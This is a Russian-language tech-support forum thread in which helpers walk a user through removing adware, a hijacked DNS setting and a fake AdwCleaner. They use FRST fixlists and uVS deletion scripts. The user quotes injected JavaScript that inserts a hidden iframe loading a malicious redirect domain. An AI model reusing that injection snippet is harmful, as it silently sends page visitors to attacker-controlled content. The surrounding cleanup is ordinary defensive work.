thyrex 1 468 Опубликовано 15 апреля, 2018 Share Опубликовано 15 апреля, 2018 Синхронизация отключается только в настройках браузера. Для этого браузер придется запускать Цитата Ссылка на сообщение Поделиться на другие сайты
kotwi 0 Опубликовано 15 апреля, 2018 Автор Share Опубликовано 15 апреля, 2018 Синхронизация отключается только в настройках браузера. Для этого браузер придется запускать Это понятно. Синхронизации нет и быть не может, я не производил ВХОД. В Хроме заблокировал "Фоновую синхронизацию" - толку нет. Вопросы моего поста №13 остаются актуальными. Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 15 апреля, 2018 Share Опубликовано 15 апреля, 2018 1. Откройте Блокнот и скопируйте в него приведенный ниже текст CreateRestorePoint: CHR DefaultSuggestURL: Default -> hxxps://suggest.yandex.net/suggest-ff.cgi?uil=ru&part={searchTerms} C:\Users\123\AppData\Local\Google\Chrome\User Data\Default\Extensions\odijcgafkhpobjlnfdgiacpdenpmbgme C:\Users\123\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmpoaahleccaibbhfjfimigepmfmmbbk CHR HKLM\...\Chrome\Extension: [bejnpnkhfgfkcpgikiinojlmdcjimobi] - hxxp://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [dkekdlkmdpipihonapoleopfekmapadh] - hxxp://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx 2016-12-24 12:30 - 2016-07-01 14:23 - 002187992 _____ (Mail.Ru) C:\Users\123\AppData\Local\Temp\2177-5628-bde1-cbfd.exe 2016-12-15 11:06 - 2016-12-15 11:06 - 002458672 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\123\AppData\Local\Temp\libeay32.dll 2015-02-23 19:07 - 2015-02-23 19:07 - 003458280 _____ () C:\Users\123\AppData\Local\Temp\mailruhomesearchvbm.exe 2015-02-23 20:35 - 2015-02-23 20:36 - 000543168 _____ () C:\Users\123\AppData\Local\Temp\masauto_runxx.dl.dll 2015-02-23 19:22 - 2015-02-23 19:22 - 000518592 _____ () C:\Users\123\AppData\Local\Temp\masblog_runxx.dl.dll 2015-02-23 19:21 - 2015-02-23 20:35 - 000506304 _____ (TODO: <Company name>) C:\Users\123\AppData\Local\Temp\masflag_runxx.dl.dll 2016-12-12 01:14 - 2016-10-21 17:22 - 004157656 _____ (Mail.Ru) C:\Users\123\AppData\Local\Temp\mrutmp.exe 2016-12-15 11:06 - 2016-12-15 11:06 - 000970912 _____ (Microsoft Corporation) C:\Users\123\AppData\Local\Temp\msvcr120.dll 2015-02-23 19:20 - 2015-02-23 19:21 - 001304512 _____ () C:\Users\123\AppData\Local\Temp\QYAgent_runxx.dl.dll MSCONFIG\startupreg: GoogleChromeAutoLaunch_E9B5D4249CCEA13E75406E6F6F1B4400 => "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 Reboot: 2. Нажмите Файл – Сохранить как3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool 4. Укажите Тип файла – Все файлы (*.*) 5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить 6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. Цитата Ссылка на сообщение Поделиться на другие сайты
kotwi 0 Опубликовано 15 апреля, 2018 Автор Share Опубликовано 15 апреля, 2018 Прикрепил Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 15 апреля, 2018 Share Опубликовано 15 апреля, 2018 Что теперь в логе AdwCleaner? Цитата Ссылка на сообщение Поделиться на другие сайты
kotwi 0 Опубликовано 15 апреля, 2018 Автор Share Опубликовано 15 апреля, 2018 Логи приложил. Реклама также вылазиет периодически, но теперь ADWCleaner находит всего 1 единственную угрозу (до этого 2 находил) после пользования браузером, а после перезагрузки и чистки ADWCleaner-ом обнарживается тоже также 1 угроза. Дополню: Открываю сайт aliexpress.com, в IE файл предлагает сохранить, в mozilla пишет следующее: var tmpexo2 = document.createElement('div');tmpexo2.setAttribute("align","center");tmpexo2.innerHTML = '<iframe src="http://tdsdomains.tk/j78Wnr" frameborder=0 width=0 height=0 style="display:none;"></iframe>';var iframeexo2 = tmpexo2.firstChild;var bodyexo2 = document.getElementsByTagName('body')[0];bodyexo2.insertBefore(tmpexo2, bodyexo2.firstChild); И не открывает. AdwCleanerS14.txt AdwCleanerC12.txt Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 15 апреля, 2018 Share Опубликовано 15 апреля, 2018 Пробуйте переустановить Firefox Цитата Ссылка на сообщение Поделиться на другие сайты
kotwi 0 Опубликовано 15 апреля, 2018 Автор Share Опубликовано 15 апреля, 2018 Переустановил, все также. Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 15 апреля, 2018 Share Опубликовано 15 апреля, 2018 И эта запись PUP.Optional.Legacy suggests.go.mail.ru тоже осталась? Цитата Ссылка на сообщение Поделиться на другие сайты
kotwi 0 Опубликовано 15 апреля, 2018 Автор Share Опубликовано 15 апреля, 2018 (изменено) ADWCleaner находит PUP.Optional.Legacy все равно. Я думаю, дело может в каком либо процессе, ведь странно - почему вместо открытия aliexpress выдается какой то код? Изменено 15 апреля, 2018 пользователем kotwi Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 15 апреля, 2018 Share Опубликовано 15 апреля, 2018 Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования, Скачайте Universal Virus Sniffer (uVS) Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к посту в теме. !!! Обратите внимание , что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора , при необходимости укажите пароль администратора и нажмите "Да" . Цитата Ссылка на сообщение Поделиться на другие сайты
kotwi 0 Опубликовано 15 апреля, 2018 Автор Share Опубликовано 15 апреля, 2018 Приложил 123-PC_2018-04-15_19-19-01.7z Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 15 апреля, 2018 Share Опубликовано 15 апреля, 2018 1) AdwCleaner у вас скачан с фейкогового сайта . www.adwcleaner.ru/ Это фейк пытающийся заработать на имени известной утилиты, а ссылка для скачивания с официального сайта https://toolslib.net/downloads/finish/1/ Деинсталируйте установленный у вас AdwCleaner. 2) Удалите остатки Comodo по инструкции отсюда. 3) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:;uVS v4.0.11 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG ;---------command-block--------- zoo %SystemDrive%\PROGRAM FILES\TENCENT\QQPCMGR\10.5.15816.217\QMTRAYPLUGIN\QMMOBILETRAYPLUGIN\ANDROIDPOPUP.EXE delall %SystemDrive%\PROGRAM FILES\TENCENT\QQPCMGR\10.5.15816.217\QMTRAYPLUGIN\QMMOBILETRAYPLUGIN\ANDROIDPOPUP.EXE zoo %SystemDrive%\USERS\123\APPDATA\LOCAL\TEMP\{31EC0859-90B7-489E-BDC2-A8A19D4F9BC8}-51.0.2704.103_50.0.2661.102_CHROME_UPDATER.EXE delall %SystemDrive%\USERS\123\APPDATA\LOCAL\TEMP\{31EC0859-90B7-489E-BDC2-A8A19D4F9BC8}-51.0.2704.103_50.0.2661.102_CHROME_UPDATER.EXE delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\COMODO\COMODO INTERNET SECURITY\CMDAGENT.EXE delref 83.149.99.201,8.8.8.8\DNS SERVER LIST delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID] delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID] delref {0C4CC089-D306-440D-9772-464E226F6539}\[CLSID] delref {05EB6920-D8AD-4350-BEF1-4F7107F70431}\[CLSID] apply regt 27 deltmp czoo restart В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..." Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен. 4) Проверьте проблему. Цитата Ссылка на сообщение Поделиться на другие сайты
kotwi 0 Опубликовано 15 апреля, 2018 Автор Share Опубликовано 15 апреля, 2018 Все сделал как сказали: 1. Удалил фейковый ADWCleaner 2. Поставил настоящий. 3. Скачал программу удаления остатков КОМОДО, но там в списке не было наименования "Комодо антивирус", поэтому выбрал первое в списке - "КОмодо I. S." 4. Выполнил скрипт, после перезагрузки проблема осталась - при клике на какую-либо ссылку (не всегда) открывает старое. При открытии алиэкспресс пишет код. ADWCleaner кстати, находит 2 проблемы - это тот же PUP. После чистки официальным ADWCleaner и перезагрузки, пишет - обнаружено угроз: 2, удалено угроз: 1. Одну так и не смог удалить, чтоли. Если нужны скрины или еще что-то, то говорите. Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 15 апреля, 2018 Share Опубликовано 15 апреля, 2018 "Пофиксите" в HijackThis: O17 - DHCP DNS 1: 83.149.99.201 Потом снова проверьте проблему. Если осталась, то свежий лог HijackThis сделайте. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.